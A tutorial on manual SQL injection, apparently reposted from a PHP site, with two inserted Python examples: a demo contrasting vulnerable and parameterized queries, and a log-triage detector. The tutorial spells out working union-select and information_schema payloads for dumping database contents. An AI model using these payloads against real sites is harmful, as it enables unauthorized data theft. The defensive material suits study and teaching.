Let's talk about the simple manual SQL injection process
This article walks through manual SQL injection, including how to determine the injection point and how to determine the injection type. I hope it is helpful to everyone.
Determine the injection point
1. Single quotation mark method: append a single quotation mark to the parameter at the end of the URL. If the page no longer displays normally and the browser returns an error message, the link may have a SQL injection vulnerability.
2. 1=1 and 1=2 method: append and 1=1 to the GET parameter in the URL and the page displays normally; replace 1=1 with 1=2 and the page displays abnormally. This difference indicates that the web page has SQL injection.
Judge the injection type
1. Numeric injection: the injected variable is not enclosed in quotation marks, for example:
select * from user where id=$id;
2. Character injection: the injected variable is wrapped in quotation marks, for example:
select * from user where username='$username';
Be sure to close the quotation marks when injecting.
3. Search injection:
select * from user where username like '%$pass%';
Construct the SQL statement as:
select * from user where username like '%pass%' union select statement '%%';
That is, the submitted variable is pass%' union select statement '% so that the quotation marks close properly.
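As an added example (not code from the article), the following Python program reproduces the three contexts above against a constructed SQLite table named user and places each vulnerable string-built query beside a parameterized one. The table, its rows and the function names are assumptions for this example; the inputs are the article's own probes (a lone quotation mark, and 1=1 / and 1=2, and a quote-closing union inside the LIKE pattern). The safe search version additionally escapes LIKE wildcards, which the article does not cover.

```python
import sqlite3

# Constructed in-memory table for this example; not data from the article.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.com"),
         (2, "bob", "bob@example.com"),
         (3, "carol", "carol@example.com")],
    )
    return conn

# --- 1. numeric context: select * from user where id=$id ---
def numeric_vulnerable(conn, id_value):
    # $id is pasted in unquoted, so "1 and 1=2" becomes part of the SQL.
    return conn.execute(f"SELECT * FROM user WHERE id={id_value}").fetchall()

def numeric_safe(conn, id_value):
    # Validate the type first: a non-integer never reaches the database.
    return conn.execute("SELECT * FROM user WHERE id=?", (int(id_value),)).fetchall()

# --- 2. character context: select * from user where username='$username' ---
def char_vulnerable(conn, username):
    # A quote in the input closes the literal early and breaks the statement.
    return conn.execute(f"SELECT * FROM user WHERE username='{username}'").fetchall()

def char_safe(conn, username):
    # With a placeholder the quote stays inside the bound value.
    return conn.execute("SELECT * FROM user WHERE username=?", (username,)).fetchall()

# --- 3. search context: select * from user where username like '%$pass%' ---
def search_vulnerable(conn, term):
    # pass%' union select ... '% closes the pattern and appends a second SELECT.
    return conn.execute(f"SELECT * FROM user WHERE username LIKE '%{term}%'").fetchall()

def search_safe(conn, term):
    # Bind the whole pattern and escape LIKE wildcards, so the user controls
    # neither the SQL text nor the wildcard semantics.
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return conn.execute(
        "SELECT * FROM user WHERE username LIKE ? ESCAPE '\\'", (f"%{escaped}%",)
    ).fetchall()

def probe(fn, conn, value):
    """Run one query builder and report ('rows', n) or ('error', exception name)."""
    try:
        return ("rows", len(fn(conn, value)))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)

if __name__ == "__main__":
    db = make_db()
    union = "zzz%' UNION SELECT id, username, email FROM user WHERE username LIKE '%"
    for label, fn, value in [
        ("numeric  1=1", numeric_vulnerable, "1 and 1=1"),
        ("numeric  1=2", numeric_vulnerable, "1 and 1=2"),
        ("numeric  safe", numeric_safe, "1 and 1=1"),
        ("char     quote", char_vulnerable, "alice'"),
        ("char     safe", char_safe, "alice'"),
        ("search   union", search_vulnerable, union),
        ("search   safe", search_safe, union),
    ]:
        print(f"{label:16} -> {probe(fn, db, value)}")
```

The vulnerable numeric query answers and 1=1 with one row and and 1=2 with none, which is exactly the differential the article's second test relies on; the parameterized versions either reject the input before it reaches the database or treat the whole string as a value and return nothing.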
Determine the injection point submission method
Determine whether the injection point is submitted via GET, POST, or a cookie, by capturing packets or similar methods.
Use order by to query fields
Use the order by clause to find out how many fields the query has, by trying successive values. For example, if entering order by 9 produces an error while order by 8 displays the page normally, the query has 8 fields.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed for id: ' order by 3 '--
That is, the query statement becomes: select * from user where id='' order by 3 '--'
Use a union query to retrieve the current database, user, and version information
Use the union select statement to query the current user user(), the database database(), the database version version(), the server operating system @@version_compile_os, and other information.
The version is very important: if it is 5.0 or above, the information_schema library can be used to easily query the desired information.
Construction statement (the + characters stand for spaces in the URL):
select * from user where id='' union select user(),database(),version()+--+;
Query the tables, columns and values in the current database
In MySQL 5.0 and above, the built-in information_schema library stores the names of all tables and columns in the database.
Next, look up the names of all tables in the current database obtained from the query in step 5 (for example, the database is database_1). information_schema.tables: a table that records the names of all tables in the database.
The constructed query statement is as follows:
select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='database_1';--
The result of the query is the table names of the current database found in step 5. information_schema.columns: records the column names of all tables in the database.
Next, query the column names based on the table name obtained above (for example, the table is table_1). Construct the statement as follows:
select * from user where id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='table_1';--
Once the column names are known, the data stored in the table can be read directly with a union query (for example, the column names found are column_1 and column_2). Construct the statement:
select * from user where id='' union select 1,column_1,column_2 from table_1;--
This queries the data stored in the specified table of the specified database.
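As an added example that is not part of the article, here is a small Python triage script that turns the probes listed in this article (the single quotation mark, and 1=1 / and 1=2, order by N, union select, information_schema) into detection signals and runs them over web-server access-log lines. The log lines are constructed for this example and the signal names are my own. Since an access log records only the GET query string, requests submitted via POST bodies or cookies (the other submission methods noted above) would need application-level request logging to be covered.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (common log format) for this example; the
# query-string values are the article's probes, URL-encoded as a browser sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=8 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=8' HTTP/1.1" 500 233
10.0.0.5 - - [10/Oct/2023:13:55:44 +0000] "GET /item.php?id=8%20and%201%3D2 HTTP/1.1" 200 120
10.0.0.5 - - [10/Oct/2023:13:55:50 +0000] "GET /item.php?id=8%27%20order%20by%209%20-- HTTP/1.1" 500 233
10.0.0.5 - - [10/Oct/2023:13:55:58 +0000] "GET /item.php?id=%27%20union%20select%20user(),database(),version()-- HTTP/1.1" 200 640
10.0.0.5 - - [10/Oct/2023:13:56:05 +0000] "GET /item.php?id=%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 900
10.0.0.9 - - [10/Oct/2023:13:57:01 +0000] "GET /search.php?q=o'neil HTTP/1.1" 200 480
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \d+'
)

# Each signal corresponds to one step of the manual process described in the article.
SIGNALS = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("boolean_probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def scan_value(value, status):
    """Return the signal names that fire on one decoded parameter value."""
    hits = [name for name, rx in SIGNALS if rx.search(value)]
    # A lone quote is common in legitimate input (O'Neil), so it is only
    # reported when the server answered with an error, matching the article's test.
    if "'" in value and status >= 500:
        hits.append("quote_probe_with_error")
    return hits

def analyze(log_text):
    """Parse each log line, URL-decode the query parameters and collect findings."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        status = int(m["status"])
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            hits = scan_value(value, status)
            if hits:
                findings.append({"line": n, "ip": m["ip"], "param": name,
                                 "value": value, "status": status, "signals": hits})
    return findings

def summarize_by_ip(findings):
    """Count findings per source address to spot a single client walking the whole process."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f['line']} {f['ip']} {f['param']}={f['value']!r} "
              f"status={f['status']} -> {', '.join(f['signals'])}")
    print(summarize_by_ip(analyze(SAMPLE_LOG)))
```

The regular expressions are a triage aid, not a filter: they only see the decoded GET query string and miss comment-obfuscated or double-encoded variants, so a hit should prompt a look at the application code behind that parameter rather than stand in for parameterized queries.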
The above is the detailed content of Let's talk about the simple manual SQL injection process. For more information, please follow other related articles on the PHP Chinese website!